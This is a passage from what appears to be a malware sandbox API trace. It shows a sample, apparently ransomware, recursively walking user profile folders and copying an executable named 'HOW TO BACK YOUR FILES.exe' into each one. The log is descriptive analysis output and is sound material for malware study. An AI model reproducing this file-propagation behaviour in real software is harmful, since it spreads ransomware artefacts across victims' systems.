lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.514] CloseHandle (hObject=0x118) returned 1 [0042.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.514] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.514] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.514] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.514] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.515] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.515] GetLastError () returned 0x0 [0042.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.515] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.515] CloseHandle (hObject=0x118) returned 1 [0042.515] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.515] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.515] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.515] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.516] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.516] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.516] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.516] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.516] GetLastError () returned 0x0 [0042.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.516] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.517] CloseHandle (hObject=0x118) returned 1 [0042.517] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.517] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.517] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.517] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.517] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.517] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.518] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.518] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.518] GetLastError () returned 0x0 [0042.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.518] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.518] CloseHandle (hObject=0x118) returned 1 [0042.518] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.518] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.519] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.519] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.519] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.519] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.519] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.519] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.519] GetLastError () returned 0x0 [0042.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.519] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.520] CloseHandle (hObject=0x118) returned 1 [0042.520] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.520] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.520] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.520] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.520] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.520] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.520] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.520] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.521] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.521] GetLastError () returned 0x0 [0042.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.521] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.521] CloseHandle (hObject=0x118) returned 1 [0042.521] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.521] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.522] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.522] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.522] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.522] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.523] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.523] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.523] GetLastError () returned 0x0 [0042.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.523] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.523] CloseHandle (hObject=0x118) returned 1 [0042.523] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.523] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.524] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.524] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.524] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.524] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.524] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.524] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.524] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.524] GetLastError () returned 0x0 [0042.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.524] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.524] CloseHandle (hObject=0x118) returned 1 [0042.525] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.525] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.525] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.525] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.525] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.525] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.525] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.525] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.526] GetLastError () returned 0x0 [0042.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.526] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.526] CloseHandle (hObject=0x118) returned 1 [0042.526] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.526] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.526] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.526] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.526] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.526] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.526] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.526] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your 